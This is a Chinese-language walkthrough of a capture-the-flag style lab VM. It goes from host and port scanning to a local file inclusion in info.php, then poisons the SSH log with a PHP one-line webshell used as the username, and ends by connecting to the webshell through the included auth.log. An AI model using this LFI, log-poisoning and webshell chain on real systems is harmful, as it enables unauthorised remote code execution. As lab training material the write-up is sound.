一、导入靶机
将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径
虚拟机设置里修改网络状态为NAT模式
二、信息收集
1、主机发现
用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141
2、端口扫描
用御剑端口扫描扫描全端口
发现21、2211、80、25、1100和8888端口开启
3、访问Web服务
网页上访问192.168.204.141,出现一个大特码头
访问192.168.47.129:8888,弹出一个登录框
4、目录扫描
使用kali的dirb进行目录扫描:dirb http://192.168.204.141/
扫描结果如下
访问antibot_image目录
发现有一个info.php文件
点开发现是一个PHP的探针文件
查看info.php的网页源码,发现存在文件包含漏洞
三、漏洞利用
在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)
成功显示,说明存在文件包含漏洞
前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-
扫描出来2211,是ssh远程连接端口
此时我们报错连接 2211
ssh '<?php @eval($_POST['cmd']);?>'@192.168.204.141 -p 2211
然后在网页端查看ubuntu报错信息:/var/log/auth.log
/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。
该目录下发现多了一些报错信息,木马大概率写入成功,
使用蚁剑进行连接,上传了一句话木马的路径:
http://192.168.204.141/antibot_image/antibots/info.php?image=/var/log/auth.log
连接密码是刚刚POST传入的:cmd
成功登陆到靶机